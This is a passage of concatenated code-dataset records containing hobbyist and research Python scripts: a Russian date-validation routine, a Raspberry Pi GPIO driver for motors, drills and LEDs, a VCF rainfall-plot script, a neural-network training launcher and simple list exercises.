'Июнь', '07': 'Июль',\n '08': 'Август', '09': 'Сентябрь', '10': 'Октябрь', '11': 'Ноябрь', '12': 'Декабрь'}\n i = 0\n while i != 1:\n if year % 4 != 0 and mount == '02':\n if 0 < int(day1) <= 28:\n i = 1\n break # print(f'Дата: {day.get(day1)} {mount.get(mount1)} {year} года')\n else:\n print('Такого дня нет в этома месяце. В феврале 28 дней')\n elif year % 4 == 0 and mount == '02':\n if 0 < int(day1) <= 29:\n i = 1\n break # print(f'Дата: {day.get(day1)} {mount.get(mount1)} {year} года')\n else:\n print('Это високосный год. В феврале 29 дней')\n elif mount1 == '04' or mount1 == '06' or mount1 == '07' or mount1 == '11':\n if 0 < int(day1) <= 30:\n i = 1\n break # print(f'Дата: {day.get(day1)} {mount.get(mount1)} {year} года')\n else:\n print('В этом месяце 30 дней')\n elif mount1 == '01' or mount1 == '03' or mount1 == '05' or mount1 == '07' or mount1 == '08' or mount1 == '10'\\\n or mount1 == '12':\n if 0 < int(day1) <= 31:\n i = 1\n break # print(f'Дата: {day.get(day1)} {mount.get(mount1)} {year} года')\n else:\n print('В этом месяце 31 день')\n else:\n # print(f'Дата: {day.get(day1)} {mount.get(mount1)} {year} года')\n print('Больше 31 дня в месяце не бывает, ну и в феврале больше 29 тоже')\n day1, mount1, year = input('Теперь введите правильную дату в числовом варианте: ').split('.')\n year = int(year)\n else:\n return\n\n\ndef func_pers_area():\n dict_all = {}\n list_info = ['Имя', 'Фамилия', 'Год рождения', 'Город проживания', 'email', 'Телефон']\n for ind in list_info:\n dict_time = {ind: input(f'Введите ваши данные {ind}: ')}\n if ind == 'Год рождения':\n check_data(dict_time.get(ind))\n dict_all.update(dict_time)\n return dict_all\n\n\ndict_man = func_pers_area()\ny = dict_man.values()\nprint(f'{dict_man.get(\"Имя\")} {dict_man.get(\"Фамилия\")} родился {dict_man.get(\"Год рождения\")} проживает в городе '\n f'{dict_man.get(\"Город проживания\")}. Email: {dict_man.get(\"email\")}. Телефон: {dict_man.get(\"Телефон\")}')","sub_path":"step_3/step_3_2.py","file_name":"step_3_2.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"563554511","text":"# Program: Algoritmo253_Para0.py\n# Author: Ramon R. Valeriano\n# Description:\n# Developed: 03/04/202 - 09:18\n# Updated:\n\nfor e in range(10):\n name = input(\"Enter with the word: \")\n name = name.upper()\n cont = 0\n for n in name:\n if n==\"A\":\n cont+=1\n print(cont)\n print()\n \n","sub_path":"Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 4/Exercicios 4a/Algoritmo253_Para0.py","file_name":"Algoritmo253_Para0.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153693840","text":"import pigpio\nimport time\nimport threading\n\nclass Gpio:\n\n\tdef __init__(self,instance=None):\n\t\tif instance == None:\n\t\t\tself.gpio = pigpio.pi()\n\t\telse:\n\t\t\tself.gpio = instance\n\n\tdef setPinOut(self,gpionum):\n\t\tself.gpio.set_mode(gpionum,pigpio.OUTPUT)\n\n\tdef setPinIn(self,gpionum):\n\t\tself.gpio.set_mode(gpionum,pigpio.INPUT)\n\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_DOWN)\n\n\tdef setServo(self,gpionum,pulse_width=500):#500~2500\n\t\tself.gpio.set_servo_pulsewidth(gpionum,pulse_width)\n\n\tdef setPWM(self,gpionum,frequency=1000,range_=255,dutycycle=128):\n\t\tself.gpio.set_PWM_frequency(gpionum,frequency)\n\t\tself.gpio.set_PWM_range(gpionum,range_)\n\t\tself.gpio.set_PWM_dutycycle(gpionum,dutycycle)\n\n\tdef changeDutycycle(self,gpionum,dutycycle):\n\t\tself.gpio.set_PWM_dutycycle(gpionum,dutycycle)\n\n\tdef setInterrupt(self,gpionum,target,edge='FALLING'):\n\t\tself.setPinIn(gpionum)\n\t\tif edge == 'FALLING':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_UP)\n\t\t\tvar = pigpio.FALLING_EDGE\n\t\telif edge == 'RISING':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_DOWN)\n\t\t\tvar = pigpio.RISING_EDGE\n\t\telif edge == 'EITHER':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_UP)\n\t\t\tvar = pigpio.EITHER_EDGE\n\t\telse:\n\t\t\traise Exception('Invalid EDGE Value')\n\t\tself.cb = self.gpio.callback(gpionum,var,target)\n\t\treturn self.cb\n\n\tdef toggleOn(self,gpionum):\n\t\tself.gpio.write(gpionum,1)\n\n\tdef toggleOff(self,gpionum):\n\t\tself.gpio.write(gpionum,0)\n\n\tdef readPin(self,gpionum):\n\t\treturn self.gpio.read(gpionum)\n\n\tdef terminate(self):\n\t\tself.gpio.stop()\n\nclass MotorControl_TB67H450FNG:\n\n\tdef __init__(self,PinR1,PinR2,PinL1,PinL2,R_speed=128,L_speed=128):\n\t\tself.gpio = Gpio()\n\t\tself.R1 = PinR1\n\t\tself.R2 = PinR2\n\t\tself.L1 = PinL1\n\t\tself.L2 = PinL2\n\t\tself.R_speed = R_speed\n\t\tself.L_speed = L_speed\n\t\tself.gpio.setPinOut(PinR1)\n\t\tself.gpio.setPinOut(PinR2)\n\t\tself.gpio.setPinOut(PinL1)\n\t\tself.gpio.setPinOut(PinL2)\n\t\tself.status = '00'\n\t\t\n\tdef spinMotor(self,mot):\n\t\tself.status = mot\n\t\tif(mot[0]=='1'):\n\t\t\tself.gpio.setPWM(self.R1,dutycycle=self.R_speed)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\telif(mot[0]=='2'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.setPWM(self.R2,dutycycle=self.R_speed)\n\t\telif(mot[0]=='0'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\t\n\t\tif(mot[1]=='1'):\n\t\t\tself.gpio.setPWM(self.L1,dutycycle=self.L_speed)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\telif(mot[1]=='2'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.setPWM(self.L2,dutycycle=self.L_speed)\n\t\telif(mot[1]=='0'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\n\tdef spinMotor_time(self,mot='00',time=3):\n\t\tself.spinMotor(mot)\n\t\ttime.sleep(time)\n\t\tself.spinMotor('00')\n\t\t\t\n\tdef stopMotor(self):\n\t\tself.spinMotor('00')\n\n\tdef setSpeed(self,speed_R=128,speed_L=128):\n\t\tself.R_speed = speed_R\n\t\tself.L_speed = speed_L\n\t\tself.spinMotor(self.status)\n\n\tdef turnLeft_St(self):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\n\tdef turnRight_St(self):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\n\tdef turnLeft(self,Time):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef turnRight(self,Time):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward(self,Time):\n\t\tself.spinMotor('11')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward_St(self):\n\t\tself.spinMotor('11')\n\n\tdef escapeStack(self):\n\t\tself.spinMotor('02')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('10')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\treturn True\n\t\n\tdef testMotor(self):\n\t\tself.spinMotor('12')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('21')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass MotorControl_TA7291P:\n\n\tdef __init__(self,PinR1,PinR2,pinR_VREF,PinL1,PinL2,pinL_VREF):\n\t\tself.gpio = Gpio()\n\t\tself.R1 = PinR1\n\t\tself.R2 = PinR2\n\t\tself.R_VREF = pinR_VREF\n\t\tself.L1 = PinL1\n\t\tself.L2 = PinL2\n\t\tself.L_VREF = pinL_VREF\n\t\tself.gpio.setPinOut(PinR1)\n\t\tself.gpio.setPinOut(PinR2)\n\t\tself.gpio.setPWM(pinR_VREF)\n\t\tself.gpio.setPinOut(PinL1)\n\t\tself.gpio.setPinOut(PinL2)\n\t\tself.gpio.setPWM(pinL_VREF)\n\t\t\n\tdef spinMotor(self,mot):\n\t\tif(mot[0]=='1'):\n\t\t\tself.gpio.toggleOn(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\telif(mot[0]=='2'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOn(self.R2)\n\t\telif(mot[0]=='0'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\t\n\t\tif(mot[1]=='1'):\n\t\t\tself.gpio.toggleOn(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\telif(mot[1]=='2'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOn(self.L2)\n\t\telif(mot[1]=='0'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\t\t\n\tdef stopMotor(self):\n\t\t\t\t#self.gpio.write(self.R1,0)\n\t\t\t\t#self.gpio.write(self.R2,0)\n\t\t\t\t#self.gpio.write(self.L1,0)\n\t\t\t\t#self.gpio.write(self.L2,0)\n\t\tself.spinMotor('00')\n\n\tdef setSpeed(self,vref_R=80,vref_L=80):\n\t\tvrefR = 2.55*vref_R\n\t\tvrefL = 2.55*vref_L\n\t\tif (((vrefL > 0) or (vrefL < 100)) or ((vrefR > 0) or (vrefR < 100))):\n\t\t\traise Exception('invalid vref setting value.')\n\t\tself.gpio.setPWM(self.R_VREF,vrefR)\n\t\tself.gpio.setPWM(self.L_VREF,vrefL)\n\n\tdef turnLeft_St(self):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\n\tdef turnRight_St(self):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\n\tdef turnLeft(self,Time):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef turnRight(self,Time):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward(self,Time):\n\t\tself.spinMotor('11')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward_St(self):\n\t\tself.spinMotor('11')\n\n\tdef escapeStack(self):\n\t\tself.spinMotor('02')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('10')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\treturn True\n\t\n\tdef testMotor(self):\n\t\tself.spinMotor('12')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('21')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Servo:\n\tdef __init__(self,gpionum,waittime=0.5):\n\t\tself.gpio = Gpio()\n\t\tself.pin = gpionum\n\t\tself.waittime = 0.5\n\n\tdef roll(self,pwidth=500):\n\t\tself.gpio.gpio.set_servo_pulsewidth(self.pin,pwidth)\n\t\ttime.sleep(self.waittime)\n\n\tdef swing(self):\n\t\tfor i in range(3):\n\t\t\tself.roll(500)\n\t\t\tself.roll(2500)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Drill_TB67H450FNG_knocked_out:\n\tdef __init__(self,pinElvA,pinElvB,pinDA,pinDB):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.motor = MotorControl_TB67H450FNG(self.PELA,self.PELB,self.DA,self.DB,R_speed=255)\n\n\tdef upDrill(self,time=1,speed=255):\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('20')\n\t\ttime.sleep(time)\n\t\tself.motor.stopMotor()\n\n\tdef downDrill(self,leng=None,speed=255):\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('10')\n\t\ttime.sleep(time)\n\t\tself.motor.stopMotor()\n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Drill_TB67H450FNG:\n\n\tvalue = 0b1111\n\trotate = 0\n\tdeg = 0\t#prev_value = 0b0000\n\n\tdef __init__(self,pinElvA,pinElvB,pinDA,pinDB,pinEA,pinEB,rad=10,maxleng=100):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.PEA = pinEA\n\t\tself.PEB = pinEB\n\t\tself.radius = rad\n\t\tself.length = maxleng\n\t\tself.motor = MotorControl_TB67H450FNG(self.PELA,self.PELB,self.DA,self.DB,R_speed=255)\n\t\tself.cb1 = self.gpio.setInterrupt(pinEA,self.update,'EITHER')\n\t\tself.cb2 = self.gpio.setInterrupt(pinEB,self.update,'EITHER')\n\n\tdef upDrill(self,leng=None,speed=255):\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('20')\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.motor.stopMotor()\n\t\t\t\tbreak \n\n\tdef downDrill(self,leng=None,speed=255):\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('10')\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.motor.stopMotor()\n\t\t\t\tbreak \n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\tdef update(self,gpio,level,tick):#減速比157:1\n\t\tif gpio == self.PEA:\n\t\t\ttmp = (self.value & 0b0001) + (level << 1)\n\t\telse:\n\t\t\ttmp = (self.value & 0b0010) + level\n\t\tprev = self.value\n\t\tself.value = ((self.value << 2) & 0b1100) + tmp\n\n\t\tif self.value == 0b1101:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b0100:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b0010:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b1011:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b1110:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b1000:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b0001:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b0100:\n\t\t\tself.rotate -= 1\n\t\telse:\n\t\t\tself.value = prev\n\n\t\treturn self.rotate\n\n\tdef getRotation(self):\n\t\treturn self.rotate*30/157\n\n\tdef testInterrupt(self,gpio,level,tick):\n\t\tprint(gpio,level,tick)\n\n\nclass Drill_TA7291P:\n\n\ttable_dict = { #データ変換テーブル\n\t\t\t'00':{'00':0,'01':1,'10':-1,'11':-2},#11はエラー\n\t\t\t'01':{'00':-1,'01':0,'10':-2,'11':1},#10はエラー\n\t\t\t'10':{'00':1,'01':-2,'10':0,'11':-1},#01はエラー\n\t\t\t'11':{'00':-2,'01':-1,'10':1,'11':0} #00はエラー\n\t\t}\n\n\tprevios_data = '00'#前回の値\n\tvalue = 0\n\n\tdef __init__(self,pinElvA,pinElvB,pinElv_VREF,pinDA,pinDB,pinEA,pinEB,rad=10,maxleng=100):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.PEL_VREF = pinElv_VREF\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.PEA = pinEA\n\t\tself.PEB = pinEB\n\t\tself.radius = rad\n\t\tself.length = maxleng\n\t\tself.gpio.setPinOut(pinElvA)\n\t\tself.gpio.setPinOut(pinElvB)\n\t\tself.gpio.setPinOut(pinDA)\n\t\tself.gpio.setPinOut(pinDB)\n\t\tself.cb1 = self.gpio.setInterrupt(pinEA,self.recData,'RISING')\n\t\tself.cb2 = self.gpio.setInterrupt(pinEB,self.recData,'RISING')\n\n\tdef upDrill(self,leng=None,speed=100):\n\t\tspd = speed/100\n\t\tval = 2000*spd + 500\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.gpio.setPWM(self.PEL_VREF,val)\n\t\tself.gpio.toggleOn(self.PELA)\n\t\tself.gpio.toggleOff(self.PELB)\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.gpio.toggleOff(self.PELA)\n\t\t\t\tself.gpio.toggleOff(self.PELB)\n\t\t\t\tbreak \n\n\tdef downDrill(self,leng=None,speed=100):\n\t\tspd = speed/100\n\t\tval = 2000*spd + 500\n\t\tif leng == None:\n\t\t\tleng = 0\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.gpio.setPWM(self.PEL_VREF,val)\n\t\tself.gpio.toggleOff(self.PELA)\n\t\tself.gpio.toggleOn(self.PELB)\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val <= leng):\n\t\t\t\tself.gpio.toggleOff(self.PELA)\n\t\t\t\tself.gpio.toggleOff(self.PELB)\n\t\t\t\tbreak \n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\tdef recData(self,gpio,level,tick):#本当はもっと軽い処理にしたいのでこの辺りは改良の余地ありか?\n\t\tfollow_data = '00'#初期化\n\t\tif gpio == self.PEA:#どちらのピンに割り込みが入ったかで分岐\n\t\t\tfollow_data = '{0}{1}'.format('1',self.previos_data[1])\n\t\telif gpio == self.PEB:\n\t\t\tfollow_data = '{0}{1}'.format(self.previos_data[0],'1')\n\t\tself.value += self.table_dict[self.previos_data][follow_data]#取得値を変換して足す\n\t\tif self.value == -2:\n\t\t\tself.value = 0\n\t\tself.previos_data = follow_data#値を保存\n\t\tself.deg = 12*self.value#度数法に変換\n\t\treturn self.deg\n\n\tdef testInterrupt(self,gpio,level,tick):\n\t\tprint(gpio,level,tick)\n\nclass HeatWire:\n\tdef __init__(self,pinFET,time=3):\n\t\tself.gpio = Gpio()\n\t\tself.pin = pinFET\n\t\tself.gpio.setPinOut(pinFET)\n\t\tself.time = time\n\n\tdef purge(self):\n\t\tself.gpio.toggleOn(self.pin)\n\t\ttime.sleep(self.time)\n\nclass LED:\n\tflag = False\n\talt = True\n\tled1_status = True\n\tled2_status = False\n\tinterval = 0.5\n\n\tdef __init__(self,LED1,LED2):\n\t\tself.gpio = Gpio()\n\t\tself.led1 = LED1\n\t\tself.led2 = LED2\n\n\tdef toggleOn(self,LED1=True,LED2=True):\n\t\tif LED1 == True:\n\t\t\tself.gpio.toggleOn(self.led1)\n\t\tif LED2 == True:\n\t\t\tself.gpio.toggleOn(self.led2)\n\n\tdef toggleOff(self,LED1=True,LED2=True):\n\t\tif LED1 == True:\n\t\t\tself.gpio.toggleOff(self.led1)\n\t\tif LED2 == True:\n\t\t\tself.gpio.toggleOff(self.led2)\n\n\tdef blink(self,LED1=True,LED2=True,alt=True,interval=0.5):\n\t\tif ((LED1 == False) and (alt == True)) or ((LED2 == False) and (alt == True)):\n\t\t\traise Exception('Invalid Argument')\n\t\tself.flag = True\n\t\tself.alt = alt\n\t\tself.interval = interval\n\t\tif self.alt == True:\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\telse:\n\t\t\tif LED1 == False:\n\t\t\t\tself.led1_status = False\n\t\t\tif LED2 == False:\n\t\t\t\tself.led2_status = False \n\t\twhile self.flag == True: \n\t\t\tself.toggleOn(self.led1_status,self.led2_status)\n\t\t\ttime.sleep(interval)\n\t\t\tif self.alt == True:\n\t\t\t\tif self.led1_status == True:\n\t\t\t\t\tself.led1_status = False\n\t\t\t\telse:\n\t\t\t\t\tself.led1_status = True\n\t\t\t\tif self.led2_status == True: \n\t\t\t\t\tself.led2_status = False\n\t\t\t\telse:\n\t\t\t\t\tself.led2_status = True\n\t\t\t\tcontinue \n\t\t\tself.toggleOff()\n\t\t\ttime.sleep(interval)\n\n\tdef startBlink(self,LED1=True,LED2=True,alt=True,interval=0.5):\n\t\tself.thread = threading.Thread(target=self.blink,args=(LED1,LED2,alt,interval))\n\t\tself.thread.daemon = True\n\t\tself.thread.start()\n\n\tdef stopBlink(self):\n\t\tself.flag = False\n\n\tdef changeBlinkPattern(self,pat='alternate'):\n\t\tif pat == 'alternate':\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\t\tself.alt = True\n\t\telif pat == 'no_alternate':\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = True\n\t\t\tself.alt = False\n\t\telif pat == 'led1_only':\n\t\t\tself.alt = False\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\telif pat == 'led2_only':\n\t\t\tself.alt == False\n\t\t\tself.led1_status = False\n\t\t\tself.led2_status = True\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\t\t\n\t\t\n\n\n\n\n\n","sub_path":"MagMell/DRV_GPIO.py","file_name":"DRV_GPIO.py","file_ext":"py","file_size_in_byte":14941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622314996","text":"#!/usr/bin/env python\n__author__ = 'Sergei F. Kliver'\nimport sys\nimport argparse\n\nfrom BCBio import GFF\nfrom MACE.Parsers.VCF import CollectionVCF, ReferenceGenome\n\n\ndef list_from_str(s):\n return s.split(\",\")\n\n\ndef figsize_from_str(s):\n try:\n x, y = map(int, s.split(','))\n return x, y\n except:\n raise argparse.ArgumentTypeError(\"Figsize must be x,y\")\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--input_file\", action=\"store\", dest=\"input\", required=True,\n help=\"Input vcf file with mutations.\")\nparser.add_argument(\"-o\", \"--output_file_prefix\", action=\"store\", dest=\"output_prefix\", required=True,\n help=\"Prefix of output file with rainfall plot\")\nparser.add_argument(\"-d\", \"--dpi\", action=\"store\", dest=\"dpi\", type=int, default=300,\n help=\"Dpi of figure\")\nparser.add_argument(\"-f\", \"--size_of_figure\", action=\"store\", dest=\"size_of_figure\", type=figsize_from_str,\n default=(40, 40),\n help=\"Size of figure in inches. X and Y values should be separated by comma. Default: 40,40\")\nparser.add_argument(\"-e\", \"--output_formats\", action=\"store\", dest=\"output_formats\", type=list_from_str,\n default=[\"svg\", \"eps\", \"pdf\", \"png\", \"jpg\"],\n help=\"Comma-separated list of formats (supported by matlotlib) of output figure.Default: svg,eps,pdf,png,jpg\")\nparser.add_argument(\"-l\", \"--suptitle\", action=\"store\", dest=\"suptitle\",\n help=\"Suptitle of figure. Default: 'Rainfall plot'\")\nparser.add_argument(\"-g\", \"--draw_gaps\", action=\"store_true\", dest=\"draw_gaps\",\n help=\"Draw gaps, ignored if reference genome is not set. Default: False\")\nparser.add_argument(\"-r\", \"--reference_genome\", action=\"store\", dest=\"ref_genome\",\n help=\"Fasta file with reference genome, required to draw gaps\")\nparser.add_argument(\"-m\", \"--masked_regions\", action=\"store\", dest=\"masked_regions\",\n help=\"Gff file with masked regions\")\nparser.add_argument(\"-b\", \"--logbase\", action=\"store\", dest=\"logbase\", default=2, type=int,\n help=\"Logbase of y axis\")\nargs = parser.parse_args()\n\nmutations = CollectionVCF(from_file=True, in_file=args.input, dont_parse_info_and_data=True)\n\nif args.ref_genome:\n reference_genome = ReferenceGenome(args.ref_genome)\n reference_genome.find_gaps()\nelse:\n reference_genome = None\n\nif args.masked_regions:\n masked_regions = {}\n with open(args.masked_regions) as gff_fd:\n for record in GFF.parse(gff_fd):\n masked_regions[record.id] = record\nelse:\n masked_regions = None\n\nmutations.rainfall_plot(args.output_prefix, single_fig=True, dpi=args.dpi, figsize=args.size_of_figure,\n facecolor=\"#D6D6D6\",\n ref_genome=reference_genome, masked_regions=masked_regions, min_gap_length=10,\n draw_gaps=args.draw_gaps, suptitle=args.suptitle,\n gaps_color=\"#777777\", masked_regions_color=\"#aaaaaa\", logbase=args.logbase,\n extension_list=args.output_formats)\n","sub_path":"scripts/draw_rainfall_plot.py","file_name":"draw_rainfall_plot.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445256626","text":"from training.train import train\r\n\r\nif __name__ == '__main__':\r\n import argparse\r\n import os\r\n \r\n parser = argparse.ArgumentParser(\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n\r\n parser.add_argument('--modeldir', type=str, default='data/Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512')\r\n parser.add_argument('--seed', type=int, default=0)\r\n parser.add_argument('--neachring', type=int, default=36)\r\n args = parser.parse_args()\r\n\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n\r\n hp = {# number of units each ring\r\n 'n_eachring': args.neachring,\r\n # number of rings/modalities\r\n 'num_ring': 3,\r\n 'activation': 'softplus',\r\n 'n_rnn': 512,\r\n 'learning_rate': 0.001,\r\n 'mix_rule': True,\r\n 'l1_h': 0.,\r\n 'use_separate_input': False,\r\n 'target_perf': 0.995,\r\n 'mature_target_perf': 0.95,\r\n 'mid_target_perf': 0.65,\r\n 'early_target_perf': 0.35,}\r\n\r\n train(args.modeldir,\r\n seed=args.seed,\r\n hp=hp,\r\n ruleset='Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks',\r\n display_step=500,\r\n continue_after_target_reached=True,)","sub_path":"Main_training_Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512.py","file_name":"Main_training_Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63356600","text":"import os\nimport time\nimport random\n\nlist = []\nlistPair = []\nlistOdd = []\nfulfill = 0\npair = 0\nodd = 0\ncounter = 0\n\nprint('Creating list..')\ntime.sleep(2)\n\nwhile fulfill < 10:\n list.append(random.randint(1, 100))\n fulfill += 1\nprint('List created', list)\n\nprint('Calculation Pair numbers...')\ntime.sleep(2)\n\nwhile pair < len(list):\n if list[pair] % 2 == 0:\n print('Pair found =', list[pair])\n listPair.append(list[pair])\n counter += 1\n pair += 1\n\nprint('Pair numbers =>', listPair, 'total = ', counter)\n\nprint('Calculation Odd numbers...')\ntime.sleep(2)\n\nwhile odd < len(list):\n if list[odd] % 2 == 1:\n listOdd.append(list[odd])\n counter += 1\n odd += 1\n\nprint('Odd numbers =>', listOdd, 'Total =', counter)\n\nos.system('pause')\n","sub_path":"python-exercises/list4/8.L4.py","file_name":"8.L4.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"310886367","text":"import numpy as np\n\ndef map1Dto2D(psi1D, psiBc, nx, ny):\n psi = np.zeros((ny,nx))\n \n row_number = 0\n for j in range(1,ny-1):\n for i in range(1,nx-1):\n psi[j,i] = psi1D[row_number]\n row_number += 1\n \n # Dirichlet BC\n psi[0,:] = psiBc[0,:]\n psi[:,0] = psiBc[:,0]\n psi[-1,:] = psiBc[-1,:]\n \n # Neumann BC\n \n psi[:,-1] = 2*psi[:,-2] - psi[:,-3]\n 